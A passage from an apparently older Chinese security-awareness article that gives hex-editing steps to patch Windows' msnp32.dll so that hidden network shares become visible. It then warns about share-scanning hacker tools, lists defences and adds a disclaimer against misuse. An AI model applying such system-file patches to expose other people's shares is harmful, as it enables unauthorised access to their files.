由于在Windows下msnp32.dll会被调用，不能直接修改此文件，所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32，msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32，找到“24 56 E8 17”（位于偏移地址00003190～000031A0处），找到后将“24”改为“00”，然后保存，关闭UltraEdit。重启计算机进入DOS模式，在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll，重启进入Windows，现在双击share就能看见被隐藏的共享了。

最后要提醒大家利用TCP/IP协议设计的NethackerⅡ等黑客软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。防范这类事情发生的方法无非是经常检查系统，给系统打上补丁，经常使用反黑杀毒软件，上网时打开防火墙，注意异常现象，留意AutoRun.inf文件的内容，关闭共享或不要设置为完全共享，且加上复杂的共享密码。

声明：本文的目的是使大家能清楚地了解网上流行的黑客手段，增强自己的防护意识，因此请大家不要用本文的方法去干违法的事情，切记：己所不欲，勿施于人！